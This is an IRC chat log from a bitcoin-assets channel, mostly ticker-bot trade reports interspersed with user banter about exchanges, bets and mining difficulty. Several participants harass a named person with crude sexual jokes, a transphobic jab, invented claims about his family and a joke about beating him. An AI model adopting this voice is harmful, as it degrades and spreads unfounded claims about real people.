[BASIC-MINING] 4 @ 0.215 = 0.86 BTC [-] Aug 25 00:47:28 [BTCTC] [BASIC-MINING] 3 @ 0.215 = 0.645 BTC [-] Aug 25 00:47:29 [BTCTC] [BASIC-MINING] 1 @ 0.2137 BTC [-] Aug 25 00:47:30 [BTCTC] [BASIC-MINING] 1 @ 0.2135 BTC [-] Aug 25 00:47:30 [BTCTC] [BASIC-MINING] 1 @ 0.21 BTC [-] Aug 25 00:47:32 [BTCTC] [BASIC-MINING] 5 @ 0.21 = 1.05 BTC [-] Aug 25 00:47:33 [BTCTC] [BASIC-MINING] 4 @ 0.21 = 0.84 BTC [-] Aug 25 00:47:34 [BTCTC] [BASIC-MINING] 1 @ 0.2065 BTC [-] Aug 25 00:47:35 [BTCTC] [BASIC-MINING] 87 @ 0.2006 = 17.4522 BTC [-] Aug 25 00:47:48 denies that luke isnt a psychopath? Aug 25 00:48:25 luke are you a psychopath? Aug 25 00:48:32 gavin is prime example, he tried to roll luke a number of times Aug 25 00:48:37 isn't there another forum for this stuff? Aug 25 00:48:54 it's called xboxlive gecko :P Aug 25 00:48:55 /part Aug 25 00:48:59 ya know. Aug 25 00:49:07 nah Aug 25 00:49:17 then dont whine Aug 25 00:49:18 havent done that since 1995 :p Aug 25 00:50:09 [BTCTC] [ACTIVEMINING] 7 @ 0.005423 = 0.038 BTC [+] Aug 25 00:50:45 of course, I'm probably just making this up to make me seem like the psycho.. Aug 25 00:51:03 [BTCTC] [LABCOIN] 20 @ 0.003384 = 0.0677 BTC [+] Aug 25 00:52:10 [BTCTC] [LABCOIN] 4 @ 0.003385 = 0.0135 BTC [+] Aug 25 00:52:24 [BTCTC] [TAT.ASICMINER] 7 @ 0.0268 = 0.1876 BTC [+] Aug 25 00:52:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.02529 = 0.2529 BTC [-] Aug 25 00:54:04 [HAVELOCK] [AM100] 10 @ 0.0241 = 0.241 BTC [-] Aug 25 00:54:07 [HAVELOCK] [AM100] 5 @ 0.024 = 0.12 BTC [-] Aug 25 00:55:04 [BTCTC] [DMS.SELLING] 150 @ 0.01677 = 2.5155 BTC [+] Aug 25 00:55:06 [BTCTC] [DMS.SELLING] 300 @ 0.0168 = 5.04 BTC [+] Aug 25 00:56:04 [BTCTC] [DMS.MINING] 6 @ 0.003414 = 0.0205 BTC [-] Aug 25 00:56:06 [BTCTC] [DMS.MINING] 344 @ 0.003414 = 1.1744 BTC [-] Aug 25 00:57:05 [MPEX] [S.MPOE] 700 @ 0.0008264 = 0.5785 BTC [-] Aug 25 00:57:06 [MPEX] [S.MPOE] 12850 @ 0.00082589 = 10.6127 BTC [-] Aug 25 00:57:10 [BTCTC] [DMS.SELLING] 70 @ 0.0169 = 1.183 BTC [+] Aug 25 00:57:35 although this channel might as well be AOL << welcome to the only sane channel in bitcoin. Aug 25 00:57:37 try and keep up. Aug 25 00:57:46 insane* Aug 25 00:57:52 [BTCTC] [DMS.SELLING] 30 @ 0.0169 = 0.507 BTC [+] Aug 25 00:58:03 [HAVELOCK] [AM100] 1 @ 0.026 BTC [+] Aug 25 00:59:03 [BTCTC] [DMS.MINING] 9 @ 0.003414 = 0.0307 BTC [-] Aug 25 00:59:05 [BTCTC] [DMS.MINING] 191 @ 0.003413 = 0.6519 BTC [-] Aug 25 00:59:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.0268 = 0.0536 BTC [+] Aug 25 00:59:20 !ticker btct asicminer-pt Aug 25 00:59:21 [BTCT:ASICMINER-PT] 1D: 2.251 / 2.5797 / 2.95 (1268 shares, 3271.1 BTC), 7D: 2.251 / 3.0683 / 3.875 (4651 shares, 14270.7 BTC), 30D: 2.251 / 3.72864 / 4.724 (14303 shares, 53330.7 BTC) Aug 25 00:59:31 cute. Aug 25 00:59:55 [BTCTC] [DMS.SELLING] 40 @ 0.0169 = 0.676 BTC [+] Aug 25 01:01:15 [HAVELOCK] [AM100] 1 @ 0.026 BTC [+] Aug 25 01:01:40 [BTCTC] [LABCOIN] 9 @ 0.003385 = 0.0305 BTC [+] Aug 25 01:01:41 [BTCTC] [LABCOIN] 30 @ 0.003384 = 0.1015 BTC [-] Aug 25 01:01:44 cute? Aug 25 01:01:47 like you? Aug 25 01:01:49 HAHAHA Aug 25 01:02:40 lol Aug 25 01:03:34 kakobrekla: what does /part do? Aug 25 01:03:51 try it Aug 25 01:04:15 if you dare Aug 25 01:04:39 it will make your internet faster Aug 25 01:04:42 [BTCTC] [DMS.MINING] 5 @ 0.003413 = 0.0171 BTC [-] Aug 25 01:04:44 [BTCTC] [DMS.MINING] 4 @ 0.003412 = 0.0136 BTC [-] Aug 25 01:04:55 [BTCTC] [DMS.MINING] 36 @ 0.003412 = 0.1228 BTC [-] Aug 25 01:04:57 [BTCTC] [DMS.MINING] 30 @ 0.00341 = 0.1023 BTC [-] Aug 25 01:05:33 [BTCTC] [DMS.SELLING] 57 @ 0.0169 = 0.9633 BTC [+] Aug 25 01:05:43 [BTCTC] [DMS.MINING] 4 @ 0.00339 = 0.0136 BTC [-] Aug 25 01:06:09 it improves the color of coffee Aug 25 01:06:23 thestringpuller: it spares you the pain of listening to these idiots Aug 25 01:06:41 you need help with that Luke-Jr? Aug 25 01:07:00 [BTCTC] [LABCOIN] 100 @ 0.0034 = 0.34 BTC [+] Aug 25 01:07:33 Luke-Jr what are you so butthurt for anyway ? Aug 25 01:08:14 mircea_popescu: BFL isnt feeding him enough shill pills Aug 25 01:08:37 CPS probably took his kids again Aug 25 01:08:51 and his wife might have been thrown back in the loony bin Aug 25 01:08:54 jesus shaped dildo is out of batteries Aug 25 01:08:59 dub: I'd be dead if they tried. Aug 25 01:09:19 kakobrekla: they actually make those you know =/ Aug 25 01:09:29 why the sad face? Aug 25 01:09:34 Diablo-D3 would know Aug 25 01:09:36 kakobrekla: because I didnt want to know Aug 25 01:09:55 well preety much all the shit i can come up with exists Aug 25 01:09:56 kakobrekla: and, thanks to the wonderfulness of the internet, I NOW KNOW Aug 25 01:10:04 AND I DIDNT _WANT TO KNOW_ Aug 25 01:10:13 YOU CANT UNKNOW THOSE KINDS OF THINGS Aug 25 01:10:17 i dont see the problem Aug 25 01:10:29 neither do I actually Aug 25 01:10:37 THEN STOP FUCKIN CAPSING FOR NOTHING Aug 25 01:10:44 i'm 12, what is this?!? Aug 25 01:10:46 I mean, if humanity is supposed to be the bride of christ, and some women take it up the ass Aug 25 01:10:50 whats the problem Aug 25 01:10:51 [MPEX] [S.MPOE] 9692 @ 0.00082775 = 8.0226 BTC [+] Aug 25 01:11:07 thestringpuller: 12 year olds aren't allowed on freenode Aug 25 01:11:08 CAPS == CRUISE CONTROL 4 COOL Aug 25 01:11:15 gecko_x2: *FOR Aug 25 01:11:40 4 realz? Aug 25 01:11:57 thestringpuller basically Luke-Jr showed up and everyone's acting retarded to make him feel at home. Aug 25 01:12:27 who told him about this channel Aug 25 01:12:36 I want to buy him a beer and then beat him with it Aug 25 01:12:47 wtf Aug 25 01:12:58 Luke-Jr has done more for the community than anyone here Aug 25 01:13:03 lol Aug 25 01:13:03 lol Aug 25 01:13:08 ur just jealous Aug 25 01:13:10 :p Aug 25 01:13:10 gecko_x2: you have a lot to learn son Aug 25 01:13:16 gecko_x2: lol. Aug 25 01:13:19 suggest to lurk moar Aug 25 01:13:22 trolling needs improvement. Aug 25 01:13:22 gecko_x2: I was one of the first 100 users of bitcoin ;) Aug 25 01:13:32 gecko_x2: more bitcoins have been mined do to my work than anyone else's Aug 25 01:13:35 gecko_x2 you are just stupid Aug 25 01:13:40 lol Aug 25 01:13:44 gecko_x2: trust me when I say luke is just a troll Aug 25 01:13:50 well that sparked some comments hehe Aug 25 01:14:43 I suspect gecko_x2 might be Luke-Jr's other wife gmaxwell in disquise Aug 25 01:14:58 dub: clearly, luke is the wife in that relationship Aug 25 01:15:12 AHAH! A PENIS! I KNEW IT! Aug 25 01:15:20 :D Aug 25 01:15:24 dude, its so small =/ Aug 25 01:15:33 cant impress anyone with that Aug 25 01:15:43 it's how you use it Aug 25 01:15:55 I heard someone say penis Aug 25 01:16:03 bullshit, theres no amount of technique that can help you if you have 3 inches Aug 25 01:16:12 there sure is Aug 25 01:16:19 [MPEX] [S.MPOE] 2850 @ 0.00082589 = 2.3538 BTC [-] Aug 25 01:16:21 [MPEX] [S.MPOE] 3727 @ 0.00082514 = 3.0753 BTC [-] Aug 25 01:16:23 [MPEX] [S.MPOE] 2023 @ 0.00082395 = 1.6669 BTC [-] Aug 25 01:16:27 yes, you fist fuck him. Aug 25 01:16:39 Damn Aug 25 01:16:44 nah, just throw money at them Aug 25 01:18:25 seriously guys, its not all that its cracked up to be Aug 25 01:18:44 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 25 01:19:32 [BTCTC] [DMS.MINING] 51 @ 0.00359 = 0.1831 BTC [+] Aug 25 01:20:34 [BTCTC] [DMS.MINING] 20 @ 0.00359 = 0.0718 BTC [+] Aug 25 01:21:12 how to waste a nice domain Aug 25 01:21:13 https://bitcointalk.org/index.php?topic=280304.msg2996167#msg2996167 Aug 25 01:21:18 [ANN] Bitcoin.com Aug 25 01:21:24 wat. Aug 25 01:21:50 so its just an advertisement for coinbase? Aug 25 01:22:01 was this the domain jared kenna held on contintions and then lost because idiot ? Aug 25 01:22:30 dunno Aug 25 01:22:33 [BTCTC] [S.MPOE-PT] 2 @ 0.0008995 = 0.0018 BTC [+] Aug 25 01:23:26 [BTCTC] [DMS.SELLING] 40 @ 0.0172 = 0.688 BTC [+] Aug 25 01:23:27 [BTCTC] [DMS.SELLING] 1 @ 0.01723 BTC [+] Aug 25 01:23:28 [BTCTC] [DMS.SELLING] 29 @ 0.01723 = 0.4997 BTC [+] Aug 25 01:23:29 [BTCTC] [DMS.SELLING] 5 @ 0.01724 = 0.0862 BTC [+] Aug 25 01:24:11 As a result of these losses, TradeHill was unable to pay its employees and was forced to shut down exchange operations on February 13, 2012. We did not want to do this. We believe in Bitcoin and greatly enjoyed being involved in the community in such an integral way. Though we had hoped to continue different business operations on bitcoin.com, we were contractually obligated to return that domain name (along with bi Aug 25 01:24:11 tcoin.co and bitcoin.co.nz) once we stopped operating as an exchange. As such, bitcoin.com is no longer owned and operated by TradeHill. Aug 25 01:24:13 right i am. Aug 25 01:26:39 [BTCTC] [TAT.MINIGAME] 1 @ 0.00024 BTC [-] Aug 25 01:26:50 Ken Slaughter, TheSwede75 and mircea_popescu were having a sauna contest, who stays the longest Aug 25 01:27:15 KSlaughter exited first because he was american and could not really stand the heat of real competition Aug 25 01:27:18 gecko_x2 sauna is a uppity tortilla reference. Aug 25 01:28:13 [BTCTC] [DMS.PURCHASE] 1 @ 0.0213 BTC [-] Aug 25 01:28:23 TheSwede75 exited second because he was used to swedish sauna's which are as hot as a warm summer day Aug 25 01:28:26 oompa loompa Aug 25 01:28:55 mircea_popescu won because he was convinced the sauna was a fraud and he was really in hell with no way to escape Aug 25 01:29:32 [BTCTC] [DMS.MINING] 13 @ 0.00359 = 0.0467 BTC [+] Aug 25 01:29:34 [BTCTC] [DMS.SELLING] 15 @ 0.01724 = 0.2586 BTC [+] Aug 25 01:30:30 [BTCTC] [DMS.SELLING] 60 @ 0.01724 = 1.0344 BTC [+] Aug 25 01:30:32 [BTCTC] [DMS.SELLING] 110 @ 0.01726 = 1.8986 BTC [+] Aug 25 01:30:33 [BTCTC] [DMS.SELLING] 449 @ 0.01733 = 7.7812 BTC [+] Aug 25 01:31:15 [BTCTC] [LABCOIN] 8 @ 0.003215 = 0.0257 BTC [-] Aug 25 01:31:18 http://youtu.be/U3i2yR0A5m4?t=1m36s Aug 25 01:31:20 "What is Bitcoin?" - YouTube Aug 25 01:32:18 lol Aug 25 01:32:18 scam Aug 25 01:32:40 [BTCTC] [DMS.SELLING] 2 @ 0.01733 = 0.0347 BTC [+] Aug 25 01:32:42 [BTCTC] [DMS.MINING] 2 @ 0.00359 = 0.0072 BTC [+] Aug 25 01:32:44 [BTCTC] [DMS.PURCHASE] 2 @ 0.02048 = 0.041 BTC [-] Aug 25 01:33:23 [BTCTC] [DMS.SELLING] 1 @ 0.01733 BTC [+] Aug 25 01:33:25 [BTCTC] [DMS.SELLING] 59 @ 0.01733 = 1.0225 BTC [+] Aug 25 01:33:26 [BTCTC] [DMS.MINING] 1 @ 0.00339 BTC [-] Aug 25 01:33:28 [BTCTC] [DMS.PURCHASE] 1 @ 0.02048 BTC [-] Aug 25 01:33:54 its peanut butter drama time Aug 25 01:34:08 [BTCTC] [DMS.SELLING] 41 @ 0.01733 = 0.7105 BTC [+] Aug 25 01:34:10 [BTCTC] [DMS.MINING] 41 @ 0.00336 = 0.1378 BTC [-] Aug 25 01:34:12 [BTCTC] [DMS.PURCHASE] 41 @ 0.02048 = 0.8397 BTC [-] Aug 25 01:34:51 [BTCTC] [DMS.SELLING] 100 @ 0.01733 = 1.733 BTC [+] Aug 25 01:34:53 [BTCTC] [DMS.MINING] 100 @ 0.00335 = 0.335 BTC [-] Aug 25 01:35:03 Luke-Jr has requested we call him by his chosen name Chelsea Aug 25 01:35:24 :\ Aug 25 01:35:39 [BTCTC] [DMS.PURCHASE] 100 @ 0.02048 = 2.048 BTC [-] Aug 25 01:36:15 dude wtf is going on with this channel today? Aug 25 01:36:19 [BTCTC] [DMS.SELLING] 3 @ 0.01733 = 0.052 BTC [+] Aug 25 01:36:21 [BTCTC] [DMS.MINING] 3 @ 0.003327 = 0.01 BTC [-] Aug 25 01:36:22 [BTCTC] [DMS.PURCHASE] 3 @ 0.02048 = 0.0614 BTC [-] Aug 25 01:37:02 [BTCTC] [DMS.SELLING] 20 @ 0.01733 = 0.3466 BTC [+] Aug 25 01:37:04 [BTCTC] [DMS.MINING] 20 @ 0.003301 = 0.066 BTC [-] Aug 25 01:37:06 [BTCTC] [DMS.PURCHASE] 20 @ 0.02048 = 0.4096 BTC [-] Aug 25 01:37:17 lol Aug 25 01:37:31 now I have peanut butter jelly time stuck in my fucking head Aug 25 01:37:33 jesus Aug 25 01:37:46 [BTCTC] [DMS.SELLING] 104 @ 0.01733 = 1.8023 BTC [+] Aug 25 01:37:48 [BTCTC] [DMS.MINING] 104 @ 0.0033 = 0.3432 BTC [-] Aug 25 01:37:50 [BTCTC] [DMS.PURCHASE] 104 @ 0.02048 = 2.1299 BTC [-] Aug 25 01:37:58 do the mashed putata Aug 25 01:38:17 i'd rather listen to wub wub dub dub Aug 25 01:38:24 (with the baseball bat) Aug 25 01:38:29 [BTCTC] [DMS.SELLING] 14 @ 0.01733 = 0.2426 BTC [+] Aug 25 01:38:31 [BTCTC] [DMS.MINING] 14 @ 0.0033 = 0.0462 BTC [-] Aug 25 01:38:33 [BTCTC] [DMS.PURCHASE] 14 @ 0.02048 = 0.2867 BTC [-] Aug 25 01:39:13 [BTCTC] [DMS.SELLING] 37 @ 0.01733 = 0.6412 BTC [+] Aug 25 01:39:14 [BTCTC] [DMS.MINING] 37 @ 0.003301 = 0.1221 BTC [+] Aug 25 01:39:16 [BTCTC] [DMS.PURCHASE] 37 @ 0.02048 = 0.7578 BTC [-] Aug 25 01:39:27 that just shows your poor taste Aug 25 01:39:48 it shows how much I don't want peanut butta jelly time stuck in my head Aug 25 01:40:16 I'd rather listen to pbjt on loop for the rest of my life than hear dubstep Aug 25 01:41:25 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.000907 = 0.0272 BTC [-] Aug 25 01:41:52 oh god Aug 25 01:41:57 wouldn't you go insane? Aug 25 01:43:00 http://www.youtube.com/watch?v=jScuYd3_xdQ utube delivrars Aug 25 01:43:01 peanut butter jelly time 10 hours - YouTube Aug 25 01:43:20 get that in yo ears Aug 25 01:43:52 [BTCTC] [DMS.MINING] 1 @ 0.003598 BTC [+] Aug 25 01:44:58 [BTCTC] [LABCOIN] 1480 @ 0.003375 = 4.995 BTC [+] Aug 25 01:46:02 VanCleef: liar Aug 25 01:46:24 hey Chelsea Aug 25 01:46:40 Luke-Jr: stop causing drama go away Aug 25 01:47:02 thestringpuller: no u Aug 25 01:47:03 this channel is normally calm where assbot only talks Aug 25 01:47:05 NO U Aug 25 01:47:06 NO U Aug 25 01:47:07 NO U Aug 25 01:48:07 http://www.youtube.com/watch?v=l8ZJu-f-XOE Aug 25 01:48:09 They Took Er Jerbs DURKA DERRR south park - YouTube Aug 25 01:48:11 [BTCTC] [LABCOIN] 2 @ 0.003375 = 0.0068 BTC [+] Aug 25 01:48:19 what is the problem thestringpuller Aug 25 01:48:51 they took his jerb Aug 25 01:49:23 Luke-Jr terk mer jerrrrb! Aug 25 01:49:25 [BTCTC] [DMS.MINING] 20 @ 0.003302 = 0.066 BTC [-] Aug 25 01:49:27 [BTCTC] [DMS.MINING] 24 @ 0.003301 = 0.0792 BTC [-] Aug 25 01:49:28 [BTCTC] [DMS.MINING] 36 @ 0.0033 = 0.1188 BTC [-] Aug 25 01:49:53 [BTCTC] [DMS.PURCHASE] 80 @ 0.02047 = 1.6376 BTC [-] Aug 25 01:51:02 it all began with ThickAsThieves wonering what would happen if he had biggest dick^Wquantum computer Aug 25 01:51:11 grab yer pitchforks Aug 25 01:54:31 [BTCTC] [DMS.SELLING] 1 @ 0.01749 BTC [+] Aug 25 01:55:43 luke-jr, to finish today's discussion as is right and proper, i suggest submitting the case before rota Aug 25 01:55:45 [BTCTC] [ACTIVEMINING] 1 @ 0.005246 BTC [-] Aug 25 01:55:48 [BTCTC] [ACTIVEMINING] 7 @ 0.005245 = 0.0367 BTC [-] Aug 25 01:55:50 as gross public indecency Aug 25 01:56:58 http://bitbet.us/bet/486/james-gibson-aka-gigavps-to-be-named-as/#c1241 Aug 25 01:57:04 bitbet is getting to be pretty lulzy by now. Aug 25 01:57:05 BitBet - James Gibson aka gigavps to be named as Pirate ponzi scheme fraudulent beneficiary Aug 25 01:57:22 [BTCTC] [LABCOIN] 85 @ 0.00323 = 0.2746 BTC [-] Aug 25 01:57:24 [BTCTC] [LABCOIN] 20 @ 0.003229 = 0.0646 BTC [-] Aug 25 01:57:24 [BTCTC] [LABCOIN] 100 @ 0.003221 = 0.3221 BTC [-] Aug 25 01:57:49 [BTCTC] [ACTIVEMINING] 7 @ 0.005245 = 0.0367 BTC [-] Aug 25 01:59:35 er...no indecency. nuisance. Aug 25 01:59:47 [BTCTC] [ACTIVEMINING] 7 @ 0.005245 = 0.0367 BTC [-] Aug 25 02:01:47 [BTCTC] [ACTIVEMINING] 7 @ 0.005245 = 0.0367 BTC [-] Aug 25 02:02:34 [BTCTC] [BASIC-MINING] 1 @ 0.21 BTC [+] Aug 25 02:02:35 [BTCTC] [BASIC-MINING] 1 @ 0.21 BTC [+] Aug 25 02:02:47 [BTCTC] [ACTIVEMINING] 31 @ 0.005245 = 0.1626 BTC [-] Aug 25 02:03:38 [BTCTC] [TAT.ASICMINER] 13 @ 0.0268 = 0.3484 BTC [+] Aug 25 02:04:18 mircea_popescu: only because someone insane runs it Aug 25 02:04:51 [BTCTC] [LABCOIN] 20 @ 0.003374 = 0.0675 BTC [+] Aug 25 02:04:52 [BTCTC] [LABCOIN] 4 @ 0.003374 = 0.0135 BTC [+] Aug 25 02:06:17 [BTCTC] [ASICMINER-PT] 1 @ 2.641 BTC [+] Aug 25 02:08:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.0268 = 0.268 BTC [+] Aug 25 02:09:31 [BTCTC] [DMS.PURCHASE] 20 @ 0.02047 = 0.4094 BTC [-] Aug 25 02:09:38 hey mjr_, you can get 15% discount on a murder too http://i.imgur.com/YisihHx.jpg Aug 25 02:10:26 [BTCTC] [DMS.MINING] 3 @ 0.003499 = 0.0105 BTC [+] Aug 25 02:11:22 [BTCTC] [ASICMINER-PT] 1 @ 2.696 BTC [+] Aug 25 02:11:49 [BTCTC] [DMS.SELLING] 15 @ 0.01745 = 0.2618 BTC [-] Aug 25 02:12:24 what the fuck is a top 10 politician. Aug 25 02:12:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.0268 = 0.0804 BTC [+] Aug 25 02:12:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.0268 = 0.268 BTC [+] Aug 25 02:13:32 [HAVELOCK] [AM100] 1 @ 0.02555 BTC [-] Aug 25 02:14:14 dunno Aug 25 02:14:18 its prolly a scam anyway Aug 25 02:14:50 no dude, everything someone says on the internet is 100% legit. Aug 25 02:15:23 i'd ask for references Aug 25 02:15:28 because it's a business. Aug 25 02:16:11 looking at the pricing scheme i remember the days a pizza was 10k btc. Aug 25 02:16:37 [BTCTC] [LABCOIN] 77 @ 0.00322 = 0.2479 BTC [-] Aug 25 02:16:38 [BTCTC] [LABCOIN] 20 @ 0.003219 = 0.0644 BTC [-] Aug 25 02:16:39 [BTCTC] [LABCOIN] 250 @ 0.00321 = 0.8025 BTC [-] Aug 25 02:16:40 [BTCTC] [LABCOIN] 1797 @ 0.0032 = 5.7504 BTC [-] Aug 25 02:16:42 hehe Aug 25 02:16:50 lucy Aug 25 02:16:53 [BTCTC] [RSM] 1 @ 0.0127 BTC [+] Aug 25 02:16:54 lucky i wasnt hungry Aug 25 02:16:56 at that time Aug 25 02:17:05 so now you can kill 100 people Aug 25 02:17:22 no, i can scam kill 100 people Aug 25 02:17:31 [BTCTC] [ACTIVEMINING] 1 @ 0.005483 BTC [+] Aug 25 02:19:01 the top 100 scam killed people. Aug 25 02:20:16 [HAVELOCK] [CFIG] 10 @ 0.14200001 = 1.42 BTC [-] Aug 25 02:20:32 the right play here i suppose would be to take a contract out on yourself for 100 btc, then get 100 btc worth of life insurance and put 100 btc on a bet you won't get killed. Aug 25 02:20:38 instascamarbitrage. Aug 25 02:21:37 I am confused: Aug 25 02:21:39 http://bitbet.us/bet/460/mt-gox-to-have-50-trade-volume/ Aug 25 02:21:43 BitBet - Mt. Gox to have < 50% trade volume before September Aug 25 02:22:08 [BTCTC] [LABCOIN] 2620 @ 0.0032 = 8.384 BTC [-] Aug 25 02:22:45 whats the confusing part Aug 25 02:23:02 [BTCTC] [LABCOIN] 1 @ 0.003329 BTC [+] Aug 25 02:23:17 [BTCTC] [ASICMINER-PT] 4 @ 2.697 = 10.788 BTC [+] Aug 25 02:23:52 well, for one thing the name implies that the volume distribution is monotonic Aug 25 02:24:12 what if it dips below 50% then back up? Aug 25 02:24:31 seems like it would be better to say "on September 1" Aug 25 02:24:34 if that's what's meant Aug 25 02:24:35 [BTCTC] [LABCOIN] 1 @ 0.003202 BTC [-] Aug 25 02:24:36 [BTCTC] [LABCOIN] 20 @ 0.003201 = 0.064 BTC [-] Aug 25 02:24:37 [BTCTC] [LABCOIN] 4583 @ 0.0032 = 14.6656 BTC [-] Aug 25 02:24:38 [BTCTC] [LABCOIN] 299 @ 0.0032 = 0.9568 BTC [-] Aug 25 02:24:53 all it takes is once. Aug 25 02:25:09 its says 'before september' Aug 25 02:25:14 i dunno how can this be confusing Aug 25 02:25:37 [BTCTC] [ASICMINER-PT] 1 @ 2.699 BTC [+] Aug 25 02:25:50 probably because I'm an idiot, but bear with me. Aug 25 02:26:06 is that pie chart a 30-day average? Aug 25 02:26:10 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [+] Aug 25 02:26:11 did someone say beer? Aug 25 02:26:53 so is it saying the 30-day average dips below 50%? Aug 25 02:27:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02689 = 0.2689 BTC [+] Aug 25 02:28:25 or do we not know, and somebody is just running a bot nonstop pulling down that pie chart and checking mtgox's slices :P Aug 25 02:28:36 qxzn probably a bunch of ppl are Aug 25 02:29:19 which by the way, is still a bit hard to sort out assuming you're including all mtgox's currencies Aug 25 02:31:26 [BTCTC] [TAT.ASICMINER] 45 @ 0.02689 = 1.2101 BTC [+] Aug 25 02:31:27 [BTCTC] [TAT.ASICMINER] 50 @ 0.02552 = 1.276 BTC [-] Aug 25 02:31:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.0255 = 0.1275 BTC [-] Aug 25 02:37:06 [BTCTC] [LABCOIN] 20 @ 0.003201 = 0.064 BTC [+] Aug 25 02:40:30 [BTCTC] [DMS.PURCHASE] 54 @ 0.02047 = 1.1054 BTC [-] Aug 25 02:41:34 [BTCTC] [LABCOIN] 20 @ 0.003201 = 0.064 BTC [+] Aug 25 02:42:01 [BTCTC] [LABCOIN] 1 @ 0.0032 BTC [-] Aug 25 02:42:10 [BTCTC] [ASICMINER-PT] 1 @ 2.745 BTC [+] Aug 25 02:42:38 [BTCTC] [DMS.MINING] 20 @ 0.003498 = 0.07 BTC [-] Aug 25 02:43:06 [BTCTC] [DMS.MINING] 206 @ 0.003499 = 0.7208 BTC [+] Aug 25 02:45:19 lerrrbcooorn Aug 25 02:47:39 proof that labcoin is for realz and no scam, they even have their own ticker bot in #labcoin Aug 25 02:47:54 [HAVELOCK] [VTX] 1 @ 0.58 BTC [-] Aug 25 02:48:50 i hope you are trolling? Aug 25 02:48:50 they're in the business of making ticker bots ? Aug 25 02:49:05 Im not trolling Aug 25 02:49:09 [BTCTC] [LABCOIN] 75 @ 0.003294 = 0.2471 BTC [+] Aug 25 02:49:16 oh, just retarded then. Aug 25 02:49:34 [BTCTC] [LABCOIN] 1 @ 0.003294 BTC [+] Aug 25 02:49:35 VanCleef do you have an amethyst ticker bot btw ? Aug 25 02:49:53 .kb bobbabat should fix that Aug 25 02:50:24 lel Aug 25 02:50:30 .kb? Aug 25 02:50:37 [BTCTC] [ASICMINER-PT] 1 @ 2.701 BTC [-] Aug 25 02:50:44 dont mind me Aug 25 02:51:18 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 25 02:51:44 bobbabot is likely to take over assbot with its close to zero latency and only relevant labcoin notification Aug 25 02:51:56 lal Aug 25 02:52:11 ;;google babadag Aug 25 02:52:12 Babadag - Wikipedia, the free encyclopedia: ; Babadağ (mountain) - Wikipedia, the free encyclopedia: ; Babadağ, Denizli - Wikipedia, the free encyclopedia: Aug 25 02:53:23 [BTCTC] [LABCOIN] 76 @ 0.003148 = 0.2392 BTC [-] Aug 25 02:54:01 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC [+] Aug 25 02:54:50 kakobrekla is working on one Aug 25 02:55:01 wha? Aug 25 02:55:15 :) Aug 25 02:55:46 [MPEX] [S.MPOE] 7200 @ 0.00082524 = 5.9417 BTC [+] Aug 25 02:56:32 mircea sorry you've answered this a few times but what proper asicminer share valuation price did you and your pr girl give it again, based on numbers something like 1.5 btc yeh? Aug 25 02:56:40 [MPEX] [S.MPOE] 3850 @ 0.00082568 = 3.1789 BTC [+] Aug 25 02:58:06 well something like that , but think about it, that was february. Aug 25 02:58:37 hmmmm, i'm trying to work it out for today Aug 25 02:58:41 [BTCTC] [LABCOIN] 1 @ 0.00329 BTC [+] Aug 25 02:59:06 time to paste that latest trilema article Aug 25 03:00:01 oh you waiting i do it? well ok there http://trilema.com/2013/bitcoin-assets-rules-and-regulations/ Aug 25 03:00:13 cool, reading Aug 25 03:00:15 VanCleef any way you go about it you'll have to make some assumptions. on one hand a curve of diff over time, on the other a curve of their hashing power. Aug 25 03:00:38 noted Aug 25 03:00:51 kinda hard to get sane assumptions. Aug 25 03:01:11 kakobrekla o look im famous nao Aug 25 03:01:35 [BTCTC] [LABCOIN] 1 @ 0.00329 BTC [+] Aug 25 03:01:48 :) Aug 25 03:02:00 theres still a problem with it Aug 25 03:02:15 hm ? Aug 25 03:02:29 well, pros dont need to read it and newbs dont read Aug 25 03:03:07 you know -pr said the exact same thing / Aug 25 03:04:05 ah Aug 25 03:06:57 .d Aug 25 03:06:58 65750060.14908 | Next Diff in 1950 blocks | Estimated Change: 7.8196% in 12d 11h 31m 47s Aug 25 03:07:05 ;;estimate Aug 25 03:07:06 Next difficulty estimate | 73026946.6999 based on data since last change | 73554502.0002 based on data for last three days Aug 25 03:07:10 ;;nethash Aug 25 03:07:11 526531.66851 Aug 25 03:07:45 [BTCTC] [LABCOIN] 6 @ 0.003287 = 0.0197 BTC [-] Aug 25 03:11:52 [BTCTC] [DMS.MINING] 2 @ 0.003557 = 0.0071 BTC [+] Aug 25 03:12:23 [BTCTC] [LABCOIN] 85 @ 0.003286 = 0.2793 BTC [-] Aug 25 03:12:24 [BTCTC] [LABCOIN] 14 @ 0.003287 = 0.046 BTC [+] Aug 25 03:12:25 [BTCTC] [LABCOIN] 250 @ 0.0033 = 0.825 BTC [+] Aug 25 03:12:26 [BTCTC] [LABCOIN] 401 @ 0.003375 = 1.3534 BTC [+] Aug 25 03:14:45 [BTCTC] [ACTIVEMINING] 10 @ 0.00525 = 0.0525 BTC [-] Aug 25 03:16:26 [BTCTC] [DMS.MINING] 26 @ 0.003557 = 0.0925 BTC [+] Aug 25 03:17:56 [BTCTC] [ASICMINER-PT] 1 @ 2.651 BTC [-] Aug 25 03:21:15 [BTCTC] [BASIC-MINING] 2 @ 0.2301 = 0.4602 BTC [+] Aug 25 03:22:15 [BTCTC] [DMS.MINING] 1 @ 0.003556 BTC [-] Aug 25 03:22:22 [HAVELOCK] [VTX] 3 @ 0.58 = 1.74 BTC [-] Aug 25 03:22:29 [HAVELOCK] [VTX] 1 @ 0.5760001 BTC [-] Aug 25 03:24:00 [BTCTC] [DMS.MINING] 16 @ 0.003556 = 0.0569 BTC [-] Aug 25 03:24:01 [BTCTC] [DMS.MINING] 28 @ 0.003557 = 0.0996 BTC [+] Aug 25 03:24:14 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] Aug 25 03:24:47 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.001241 = 0.0347 BTC [+] Aug 25 03:25:11 [BTCTC] [ASICMINER-PT] 3 @ 2.65 = 7.95 BTC [-] Aug 25 03:25:32 [BTCTC] 